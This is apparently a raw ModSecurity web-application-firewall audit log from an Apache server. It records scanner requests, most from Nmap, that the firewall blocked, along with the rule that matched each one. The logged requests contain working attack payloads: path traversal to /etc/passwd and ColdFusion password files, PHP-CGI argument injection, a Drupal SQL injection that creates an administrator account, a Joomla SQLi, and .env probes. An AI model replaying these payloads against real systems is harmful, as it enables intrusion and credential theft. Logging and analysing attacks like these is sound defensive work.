Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5e02b43-Z-- --198f4a1e-A-- [08/Jun/2025:23:51:02 +0700] aEW_dqD1_iznf-QmBECZcQAAAIs 103.236.140.4 43434 103.236.140.4 8181 --198f4a1e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.31 (KHTML like Gecko) Chrome/26.0.1410.63 Safari/537.31 Accept-Charset: utf-8 --198f4a1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --198f4a1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749401462640396 817 (- - -) Stopwatch2: 1749401462640396 817; combined=339, p1=294, p2=0, p3=0, p4=0, p5=45, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --198f4a1e-Z-- --98c7fc60-A-- [09/Jun/2025:00:08:25 +0700] aEXDicCyjFxjzV1Pwa07jwAAABA 103.236.140.4 44454 103.236.140.4 8181 --98c7fc60-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.192.2.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.192.2.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --98c7fc60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98c7fc60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749402505153791 2989 (- - -) Stopwatch2: 1749402505153791 2989; combined=1331, p1=459, p2=833, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98c7fc60-Z-- --0a2b7b54-A-- [09/Jun/2025:00:17:33 +0700] aEXFrYsoVckF-yt1MVzcdQAAAMI 103.236.140.4 44504 103.236.140.4 8181 --0a2b7b54-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.31 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.31 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --0a2b7b54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a2b7b54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749403053138013 869 (- - -) Stopwatch2: 1749403053138013 869; combined=362, p1=321, p2=0, p3=0, p4=0, p5=41, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a2b7b54-Z-- --cde7f072-A-- [09/Jun/2025:00:33:09 +0700] aEXJVce0OZpePEzoRnpYygAAAFc 103.236.140.4 44564 103.236.140.4 8181 --cde7f072-B-- GET /zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../dev/null%00 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --cde7f072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cde7f072-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:skin outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||103.236.140.4|F|3"] [data "ARGS:skin=../../../../../../../../../dev/null\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403989726204 2467 (- - -) Stopwatch2: 1749403989726204 2467; combined=1305, p1=357, p2=920, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cde7f072-Z-- --d3f16640-A-- [09/Jun/2025:00:33:11 +0700] aEXJV6D1_iznf-QmBECaGQAAAI8 103.236.140.4 44586 103.236.140.4 8181 --d3f16640-B-- POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close Content-Length: 52 User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --d3f16640-C-- --d3f16640-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3f16640-E-- --d3f16640-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=1 -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=1 -d auto_prepend_file=php://input: -d allow_url_include=1 -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403991861406 2634 (- - -) Stopwatch2: 1749403991861406 2634; combined=1448, p1=332, p2=1079, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3f16640-Z-- --5aaed809-A-- [09/Jun/2025:00:33:12 +0700] aEXJWKD1_iznf-QmBECaGwAAAJQ 103.236.140.4 44596 103.236.140.4 8181 --5aaed809-B-- GET /zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --5aaed809-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5aaed809-E-- --5aaed809-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403992194566 1710 (- - -) Stopwatch2: 1749403992194566 1710; combined=585, p1=423, p2=137, p3=0, p4=0, p5=25, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5aaed809-Z-- --6fa51871-A-- [09/Jun/2025:00:33:12 +0700] aEXJWKD1_iznf-QmBECaHQAAAJU 103.236.140.4 44604 103.236.140.4 8181 --6fa51871-B-- POST /aczpbuglrjuh HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close Content-Length: 100 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --6fa51871-C-- usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=../../../../../etc/passwd&subform[1][cXIb8O3]=1 --6fa51871-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fa51871-E-- --6fa51871-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /aczpbuglrjuh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403992310153 1656 (- - -) Stopwatch2: 1749403992310153 1656; combined=590, p1=349, p2=210, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fa51871-Z-- --236f5004-A-- [09/Jun/2025:00:33:13 +0700] aEXJWce0OZpePEzoRnpY0wAAAFA 103.236.140.4 44612 103.236.140.4 8181 --236f5004-B-- GET /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --236f5004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --236f5004-E-- --236f5004-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1749403993610634 1670 (- - -) Stopwatch2: 1749403993610634 1670; combined=559, p1=333, p2=197, p3=0, p4=0, p5=29, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --236f5004-Z-- --eaae3122-A-- [09/Jun/2025:00:33:13 +0700] aEXJWaD1_iznf-QmBECaHwAAAJI 103.236.140.4 44614 103.236.140.4 8181 --eaae3122-B-- POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close Content-Length: 34 User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --eaae3122-C-- --eaae3122-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eaae3122-E-- --eaae3122-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=1 -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=1 -d auto_prepend_file=php://input: -d allow_url_include=1 -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403993980930 2311 (- - -) Stopwatch2: 1749403993980930 2311; combined=1408, p1=351, p2=1030, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eaae3122-Z-- --b6f64f22-A-- [09/Jun/2025:00:33:14 +0700] aEXJWsCyjFxjzV1Pwa07ngAAABA 103.236.140.4 44622 103.236.140.4 8181 --b6f64f22-B-- GET /CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --b6f64f22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6f64f22-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:locale outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||103.236.140.4|F|3"] [data "ARGS:locale=..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5cCFusionMX7\x5clib\x5cpassword.properties\x00en"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403994065550 1654 (- - -) Stopwatch2: 1749403994065550 1654; combined=725, p1=334, p2=364, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6f64f22-Z-- --f79b3c59-A-- [09/Jun/2025:00:33:14 +0700] aEXJWosoVckF-yt1MVzcfgAAANA 103.236.140.4 44620 103.236.140.4 8181 --f79b3c59-B-- POST /?q=/user/login HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close Content-Length: 515 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --f79b3c59-C-- name[0;insert%20into%20users%20%28uid%2Cname%2Cpass%2Cmail%2Cstatus%29%20select%20max%28uid%29%2B1%2C%27inhemffids%27%2C%27%24P%24DxoefzbndQIxTUOXjlVX.JfHThB74s1%27%2C%27egeyuohf%40famfo.sqm%27%2C1%20from%20users%3Binsert%20into%20users_roles%20%28uid%2C%20rid%29%20VALUES%20%28%28select%20uid%20from%20users%20where%20name%3D%27inhemffids%27%29%2C%20%28select%20rid%20from%20role%20where%20name%20%3D%20%27administrator%27%29%29%3B#%20%20]=lalfliecqw&name[0]=dlheczwsnt&pass=heyhkuggbw&form_id=user_login&op=Log+in --f79b3c59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f79b3c59-E-- --f79b3c59-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||103.236.140.4|F|2"] [data "Matched Data: select uid from users found within REQUEST_URI: /?q=/user/login"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403994065538 4559 (- - -) Stopwatch2: 1749403994065538 4559; combined=3421, p1=346, p2=3048, p3=0, p4=0, p5=26, sr=72, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f79b3c59-Z-- --1f33da23-A-- [09/Jun/2025:00:33:14 +0700] aEXJWse0OZpePEzoRnpY1AAAAFg 103.236.140.4 44626 103.236.140.4 8181 --1f33da23-B-- POST /phpMyAdmin-2.6.4-pl1/libraries/grab_globals.lib.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close Content-Length: 100 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --1f33da23-C-- usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=../../../../../etc/passwd&subform[1][cXIb8O3]=1 --1f33da23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f33da23-E-- --1f33da23-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpMyAdmin-2.6.4-pl1/libraries/grab_globals.lib.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403994908296 1511 (- - -) Stopwatch2: 1749403994908296 1511; combined=573, p1=351, p2=195, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f33da23-Z-- --64e57332-A-- [09/Jun/2025:00:33:15 +0700] aEXJW8CyjFxjzV1Pwa07nwAAABE 103.236.140.4 44630 103.236.140.4 8181 --64e57332-B-- GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1) HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --64e57332-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64e57332-E-- --64e57332-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||103.236.140.4|F|2"] [data "Matched Data: updatexml(1,concat(1,user()),1) found within MATCHED_VAR: updatexml(1,concat(1,user()),1)"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403995509247 3087 (- - -) Stopwatch2: 1749403995509247 3087; combined=1830, p1=401, p2=1403, p3=0, p4=0, p5=26, sr=113, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64e57332-Z-- --117f5e58-A-- [09/Jun/2025:00:33:15 +0700] aEXJW6D1_iznf-QmBECaIAAAAIA 103.236.140.4 44632 103.236.140.4 8181 --117f5e58-B-- HEAD / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close Range: bytes=1-0,0-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10 User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --117f5e58-F-- HTTP/1.1 403 Forbidden Connection: close Content-Type: text/html; charset=iso-8859-1 --117f5e58-H-- Message: Access denied with code 403 (phase 2). Match of "ge %{tx.1}" against "TX:2" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "56"] [id "210330"] [rev "1"] [msg "COMODO WAF: Range: Invalid Last Byte Value||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403995710146 1829 (- - -) Stopwatch2: 1749403995710146 1829; combined=759, p1=366, p2=365, p3=0, p4=0, p5=27, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --117f5e58-Z-- --31c9d068-A-- [09/Jun/2025:00:33:17 +0700] aEXJXcCyjFxjzV1Pwa07oQAAAAM 103.236.140.4 44640 103.236.140.4 8181 --31c9d068-B-- GET /CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --31c9d068-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31c9d068-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:locale outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||103.236.140.4|F|3"] [data "ARGS:locale=..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5cCFusionMX\x5clib\x5cpassword.properties\x00en"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403997333239 2005 (- - -) Stopwatch2: 1749403997333239 2005; combined=771, p1=350, p2=393, p3=0, p4=0, p5=27, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31c9d068-Z-- --550aad63-A-- [09/Jun/2025:00:33:18 +0700] aEXJXsCyjFxjzV1Pwa07pQAAAAY 103.236.140.4 44650 103.236.140.4 8181 --550aad63-B-- GET /CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --550aad63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --550aad63-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:locale outside range: 1-255. 
